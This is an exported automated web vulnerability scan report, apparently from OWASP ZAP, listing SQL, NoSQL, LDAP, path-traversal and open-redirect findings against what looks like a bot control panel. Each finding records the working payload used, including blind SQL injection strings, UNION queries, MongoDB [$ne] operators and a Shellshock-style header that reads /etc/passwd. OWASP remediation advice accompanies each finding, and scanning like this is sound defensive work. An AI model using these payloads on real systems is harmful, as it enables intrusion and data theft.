URL http://142.202.242.172/TQUIA729JAULAMJS%25')%20RLIKE%20(SELECT%20(CASE%20WHEN%20(7616=5031)%20THEN%200x54515549413732394a41554c414d4a53%20ELSE%200x28%20END))%20AND%20('%25'='/tasks_page.php
Method POST
Parameter TQUIA729JAULAMJS
Attack TQUIA729JAULAMJS%') RLIKE (SELECT (CASE WHEN (2926=2926) THEN 0x54515549413732394a41554c414d4a53 ELSE 0x28 END)) AND ('%'='
Evidence
Request Header - size: 609 bytes.
Request Body - size: 0 bytes.
Response Header - size: 204 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?query=query%29%29+RLIKE+%28SELECT+%28CASE+WHEN+%283791%3D4771%29+THEN+0x7175657279+ELSE+0x28+END%29%29+AND+%28%284078%3D4078
Method POST
Parameter query
Attack query)) RLIKE (SELECT (CASE WHEN (8670=8670) THEN 0x7175657279 ELSE 0x28 END)) AND ((7410=7410
Evidence
Request Header - size: 599 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 560 bytes.
Instances 6
Solution
Do not trust client side input, even if there is client side validation in place.

In general, type check all data on the server side.

If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'

If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.

If database Stored Procedures can be used, use them.

Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!

Do not create dynamic SQL queries using simple string concatenation.

Escape all data received from the client.

Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.

Apply the privilege of least privilege by using the least privileged database user possible.

In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.

Grant the minimum database access that is necessary for the application.
Reference https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
Tags OWASP_2021_A03
OWASP_2017_A01
CWE Id 89
WASC Id 19
Plugin Id 90018
High
Advanced SQL Injection - PostgreSQL boolean-based blind - Stacked queries
Description
A SQL injection may be possible using the attached payload
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV%3BSELECT+%28CASE+WHEN+%285664%3D7016%29+THEN+5664+ELSE+1%2F%28SELECT+0%29+END%29--&id=54
Method GET
Parameter bot
Attack DESKTOP-95IQEEV;SELECT (CASE WHEN (3792=3792) THEN 3792 ELSE 1/(SELECT 0) END)--
Evidence
Request Header - size: 870 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 560 bytes.
Instances 1
Solution
Do not trust client side input, even if there is client side validation in place.

In general, type check all data on the server side.

If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'

If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.

If database Stored Procedures can be used, use them.

Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!

Do not create dynamic SQL queries using simple string concatenation.

Escape all data received from the client.

Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.

Apply the privilege of least privilege by using the least privileged database user possible.

In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.

Grant the minimum database access that is necessary for the application.
Reference https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
Tags OWASP_2021_A03
OWASP_2017_A01
CWE Id 89
WASC Id 19
Plugin Id 90018
High
External Redirect
Description
URL redirectors represent common functionality employed by web sites to forward an incoming request to an alternate resource. This can be done for a variety of reasons and is often done to allow resources to be moved within the directory structure and to avoid breaking functionality for users that request the resource at its previous location. URL redirectors may also be used to implement load balancing, leveraging abbreviated URLs or recording outgoing links. It is this last implementation which is often used in phishing attacks as described in the example below. URL redirectors do not necessarily represent a direct security vulnerability but can be abused by attackers trying to social engineer victims into believing that they are navigating to a site other than the true destination.
URL http://142.202.242.172/xampp
Method GET
Parameter host
Attack 7548671629728595560.owasp.org
Evidence 7548671629728595560.owasp.org
Request Header - size: 254 bytes.
Request Body - size: 0 bytes.
Response Header - size: 248 bytes.
Response Body - size: 370 bytes.
Instances 1
Solution
Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use an allow list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a deny list). However, deny lists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."

Use an allow list of approved URLs or domains to be used for redirection.

Use an intermediate disclaimer page that provides the user with a clear warning that they are leaving your site. Implement a long timeout before the redirect occurs, or force the user to click on the link. Be careful to avoid XSS problems when generating the disclaimer page.

When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.

For example, ID 1 could map to "/login.asp" and ID 2 could map to "https://www.example.com/". Features such as the ESAPI AccessReferenceMap provide this capability.

Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.

Many open redirect problems occur because the programmer assumed that certain inputs could not be modified, such as cookies and hidden form fields.
Reference https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html
https://cwe.mitre.org/data/definitions/601.html
Tags OWASP_2021_A03
WSTG-v42-CLNT-04
OWASP_2017_A01
CWE Id 601
WASC Id 38
Plugin Id 20019
High
LDAP Injection
Description
LDAP Injection may be possible. It may be possible for an attacker to bypass authentication controls, and to view and modify arbitrary data in the LDAP directory.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter password
Attack Equivalent LDAP expression: [\' UNION SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),\'a\') -- -)(objectClass=*]. Random parameter: [p1znp6wofqs4vmgkdzob037dwmdnpaovyv3zcpy7o9xf829jwq90wooa3789bdsugi4tptljm7y2pfxq34kv4exmqusopkl92uwo6].
Evidence
Request Header - size: 1,061 bytes.
Request Body - size: 208 bytes.
Response Header - size: 252 bytes.
Response Body - size: 0 bytes.
Instances 1
Solution
Validate and/or escape all user input before using it to create an LDAP query. In particular, the following characters (or combinations) should be deny listed:

&

|

!

<

>

=

~=

>=

<=

*

(

)

,

+

-

"

'

;

\

/

NUL character

Reference http://www.testingsecurity.com/how-to-test/injection-vulnerabilities/LDAP-Injection
https://owasp.org/www-community/attacks/LDAP_Injection
Tags OWASP_2021_A03
WSTG-v42-INPV-06
OWASP_2017_A01
CWE Id 90
WASC Id 29
Plugin Id 40015
High
NoSQL Injection - MongoDB
Description
MongoDB query injection may be possible.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php
Method GET
Parameter TQUIA729JAULAMJS
Attack
Evidence
Request Header - size: 221 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter Content-Type
Attack
Evidence
Request Header - size: 1,061 bytes.
Request Body - size: 208 bytes.
Response Header - size: 252 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172//dashboard.php?id=54
Method GET
Parameter TQUIA729JAULAMJS
Attack TQUIA729JAULAMJS[$ne]
Evidence
Request Header - size: 791 bytes.
Request Body - size: 0 bytes.
Response Header - size: 240 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172//login.php
Method GET
Parameter TQUIA729JAULAMJS
Attack TQUIA729JAULAMJS[$ne]
Evidence
Request Header - size: 205 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172//login.php/327qi
Method GET
Parameter TQUIA729JAULAMJS
Attack TQUIA729JAULAMJS[$ne]
Evidence
Request Header - size: 211 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172//login.php/327qi/Capture.PNG
Method GET
Parameter TQUIA729JAULAMJS
Attack TQUIA729JAULAMJS[$ne]
Evidence
Request Header - size: 409 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172//login.php/327qi/Sound%20Effects
Method GET
Parameter TQUIA729JAULAMJS
Attack TQUIA729JAULAMJS[$ne]
Evidence
Request Header - size: 227 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172//login.php/327qi/Sound%20Effects/error.wav
Method GET
Parameter TQUIA729JAULAMJS
Attack TQUIA729JAULAMJS[$ne]
Evidence
Request Header - size: 423 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172//tasks_page.php
Method GET
Parameter TQUIA729JAULAMJS
Attack TQUIA729JAULAMJS[$ne]
Evidence
Request Header - size: 443 bytes.
Request Body - size: 0 bytes.
Response Header - size: 240 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter Content-Type
Attack Content-Type[$ne]
Evidence
Request Header - size: 1,028 bytes.
Request Body - size: 208 bytes.
Response Header - size: 255 bytes.
Response Body - size: 3,435 bytes.
Instances 10
Solution
Do not trust client side input and escape all data on the server side.

Avoid to use the query input directly into the where and group clauses and upgrade all drivers at the latest available version.
Reference https://arxiv.org/pdf/1506.04082.pdf
https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection.html
Tags OWASP_2021_A03
WSTG-v42-INPV-05
OWASP_2017_A01
CWE Id 943
WASC Id 19
Plugin Id 40033
High
Path Traversal
Description
The Path Traversal attack technique allows an attacker access to files, directories, and commands that potentially reside outside the web document root directory. An attacker may manipulate a URL in such a way that the web site will execute or reveal the contents of arbitrary files anywhere on the web server. Any device that exposes an HTTP-based interface is potentially vulnerable to Path Traversal.

Most web sites restrict user access to a specific portion of the file-system, typically called the "web document root" or "CGI root" directory. These directories contain the files intended for user access and the executable necessary to drive web application functionality. To access files or execute commands anywhere on the file-system, Path Traversal attacks will utilize the ability of special-characters sequences.

The most basic Path Traversal attack uses the "../" special-character sequence to alter the resource location requested in the URL. Although most popular web servers will prevent this technique from escaping the web document root, alternate encodings of the "../" sequence may help bypass the security filters. These method variations include valid and invalid Unicode-encoding ("..%u2216" or "..%c0%af") of the forward slash character, backslash characters ("..\") on Windows-based servers, URL encoded characters "%2e%2e%2f"), and double URL encoding ("..%255c") of the backslash character.

Even if the web server properly restricts Path Traversal attempts in the URL path, a web application itself may still be vulnerable due to improper handling of user-supplied input. This is a common problem of web applications that use template mechanisms or load static text from files. In variations of the attack, the original URL parameter value is substituted with the file name of one of the web application's dynamic scripts. Consequently, the results can reveal source code because the file is interpreted as text instead of an executable script. These techniques often employ additional special characters such as the dot (".") to reveal the listing of the current working directory, or "%00" NULL characters in order to bypass rudimentary file extension checks.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter host
Attack /login.php
Evidence
Request Header - size: 744 bytes.
Request Body - size: 0 bytes.
Response Header - size: 206 bytes.
Response Body - size: 325 bytes.
Instances 1
Solution
Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use an allow list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a deny list). However, deny lists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."

For filenames, use stringent allow lists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses, and exclude directory separators such as "/". Use an allow list of allowable file extensions.

Warning: if you attempt to cleanse your data, then do so that the end result is not in the form that can be dangerous. A sanitizing mechanism can remove characters such as '.' and ';' which may be required for some exploits. An attacker can try to fool the sanitizing mechanism into "cleaning" data into a dangerous form. Suppose the attacker injects a '.' inside a filename (e.g. "sensi.tiveFile") and the sanitizing mechanism removes the character resulting in the valid filename, "sensitiveFile". If the input data are now assumed to be safe, then the file may be compromised.

Inputs should be decoded and canonicalized to the application's current internal representation before being validated. Make sure that your application does not decode the same input twice. Such errors could be used to bypass allow list schemes by introducing dangerous inputs after they have been checked.

Use a built-in path canonicalization function (such as realpath() in C) that produces the canonical version of the pathname, which effectively removes ".." sequences and symbolic links.

Run your code using the lowest privileges that are required to accomplish the necessary tasks. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.

When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.

Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by your software.

OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows you to specify restrictions on file operations.

This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise.
Reference https://owasp.org/www-community/attacks/Path_Traversal
https://cwe.mitre.org/data/definitions/22.html
Tags OWASP_2021_A01
WSTG-v42-ATHZ-01
OWASP_2017_A05
CWE Id 22
WASC Id 33
Plugin Id 6
High
SQL Injection
Description
SQL injection may be possible.
URL http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54
Method GET
Parameter sec-ch-ua
Attack "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"" AND "1"="1" --
Evidence
Request Header - size: 714 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54
Method GET
Parameter Sec-Fetch-Site
Attack same-origin%
Evidence
Request Header - size: 699 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54
Method GET
Parameter User-Agent
Attack () {:;}; /bin/cat /etc/passwd%' --
Evidence
Request Header - size: 698 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54%22+AND+%221%22%3D%221
Method GET
Parameter id
Attack 54" OR "1"="1
Evidence
Request Header - size: 720 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter sec-ch-ua
Attack "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"" AND "1"="1
Evidence
Request Header - size: 819 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter sec-ch-ua-mobile
Attack ?0' AND '1'='1' --
Evidence
Request Header - size: 823 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter Sec-Fetch-Dest
Attack document OR 1=1 --
Evidence
Request Header - size: 818 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter Sec-Fetch-Mode
Attack navigate AND 1=1
Evidence
Request Header - size: 815 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=56-2
Method GET
Parameter id
Attack 56-2
Evidence
Request Header - size: 809 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php
Method GET
Parameter sec-ch-ua-platform
Attack "Windows" OR 1=1 --
Evidence
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi%20OR%201=1%20AND%201=1
Method GET
Parameter 327qi OR 1=1
Attack 327qi OR 1=1 OR 1=1
Evidence
Request Header - size: 250 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi%20OR%201=1/Sound%20Effects
Method GET
Parameter 327qi
Attack 327qi OR 1=1
Evidence
Request Header - size: 254 bytes.
Request Body - size: 0 bytes.
Response Header - size: 206 bytes.
Response Body - size: 542 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi%25'%20%20--%20/Sound%20Effects/error.wav
Method GET
Parameter 327qi
Attack 327qi%' --
Evidence
Request Header - size: 454 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi%25'%20%20--%20/Sound%20Effects/error.wav
Method GET
Parameter 327qi
Attack 327qi%' --
Evidence
Request Header - size: 454 bytes.
Request Body - size: 0 bytes.
Response Header - size: 206 bytes.
Response Body - size: 542 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects%20ASC%20%20--%20/error.wav
Method GET
Parameter Sound Effects
Attack Sound Effects ASC --
Evidence
Request Header - size: 456 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects%25
Method GET
Parameter Sound Effects
Attack Sound Effects%
Evidence
Request Header - size: 246 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav?query=query%22+OR+%221%22%3D%221%22+--+
Method GET
Parameter query
Attack query" OR "1"="1" --
Evidence
Request Header - size: 479 bytes.
Request Body - size: 0 bytes.
Response Header - size: 206 bytes.
Response Body - size: 542 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects?query=query%25%27++--+
Method GET
Parameter query
Attack query%' --
Evidence
Request Header - size: 266 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV%25%27++--+&value=%271%27%3D1%27&id=54
Method GET
Parameter bot
Attack DESKTOP-95IQEEV%' --
Evidence
Request Header - size: 781 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter Accept
Attack text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" AND "1"="1" --
Evidence
Request Header - size: 737 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter sec-ch-ua
Attack "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"%
Evidence
Request Header - size: 722 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter sec-ch-ua-platform
Attack "Windows"" OR "1"="1" --
Evidence
Request Header - size: 736 bytes.
Request Body - size: 0 bytes.
Response Header - size: 261 bytes.
Response Body - size: 560 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter Sec-Fetch-Site
Attack same-origin%" --
Evidence
Request Header - size: 727 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter Upgrade-Insecure-Requests
Attack 1" OR "1"="1" --
Evidence
Request Header - size: 736 bytes.
Request Body - size: 0 bytes.
Response Header - size: 261 bytes.
Response Body - size: 560 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54+AND+1%3D1+--+
Method GET
Parameter id
Attack 54 AND 1=1 --
Evidence
Request Header - size: 735 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter Accept-Language
Attack en-US,en;q=0.9 OR 1=1 --
Evidence
Request Header - size: 781 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter Referer
Attack https://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54' OR '1'='1
Evidence
Request Header - size: 782 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter sec-ch-ua-mobile
Attack ?0%' --
Evidence
Request Header - size: 776 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter sec-ch-ua-platform
Attack "Windows"%" --
Evidence
Request Header - size: 776 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter User-Agent
Attack () {:;}; /bin/cat /etc/passwd' AND '1'='1' --
Evidence
Request Header - size: 770 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54%25%27++--+
Method GET
Parameter id
Attack 54%' --
Evidence
Request Header - size: 781 bytes.
Request Body - size: 0 bytes.
Response Header - size: 261 bytes.
Response Body - size: 560 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27+AND+1%3D1+--+&id=54
Method GET
Parameter value
Attack '1'=1' AND 1=1 --
Evidence
Request Header - size: 784 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27%25%27++--+&bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter command
Attack '1'=1'%' --
Evidence
Request Header - size: 803 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV%22+AND+%221%22%3D%221%22+--+&id=54
Method GET
Parameter bot
Attack DESKTOP-95IQEEV" AND "1"="1" --
Evidence
Request Header - size: 821 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter sec-ch-ua-platform
Attack "Windows"%' --
Evidence
Request Header - size: 798 bytes.
Request Body - size: 0 bytes.
Response Header - size: 261 bytes.
Response Body - size: 560 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter Upgrade-Insecure-Requests
Attack 1' AND '1'='1
Evidence
Request Header - size: 804 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54%27+AND+%271%27%3D%271%27+--+
Method GET
Parameter id
Attack 54' OR '1'='1' --
Evidence
Request Header - size: 821 bytes.
Request Body - size: 0 bytes.
Response Header - size: 333 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter Accept
Attack text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8%' --
Evidence
Request Header - size: 465 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter Accept-Language
Attack en-US,en;q=0.5' OR '1'='1' --
Evidence
Request Header - size: 475 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter Sec-Fetch-Dest
Attack document%
Evidence
Request Header - size: 460 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter Sec-Fetch-Mode
Attack navigate' OR '1'='1' --
Evidence
Request Header - size: 475 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter Sec-Fetch-Site
Attack none%" --
Evidence
Request Header - size: 465 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter Accept
Attack text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' OR '1'='1
Evidence
Request Header - size: 715 bytes.
Request Body - size: 0 bytes.
Response Header - size: 260 bytes.
Response Body - size: 560 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter sec-ch-ua
Attack "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"%" --
Evidence
Request Header - size: 710 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter Upgrade-Insecure-Requests
Attack 1 ASC --
Evidence
Request Header - size: 712 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%22+AND+%221%22%3D%221%22+--+
Method GET
Parameter id
Attack 54" AND "1"="1" --
Evidence
Request Header - size: 733 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54&task_select=1&params=%27+UNION+SELECT+%40%40version+--+-&unit_EXEC=18.9&limit=%27+UNION+SELECT+%40%40version+--+-&dllFunction=%22+OR+%221%22%3D%221&customArgs=
Method GET
Parameter dllFunction
Attack " OR "1"="1
Evidence
Request Header - size: 993 bytes.
Request Body - size: 0 bytes.
Response Header - size: 261 bytes.
Response Body - size: 560 bytes.
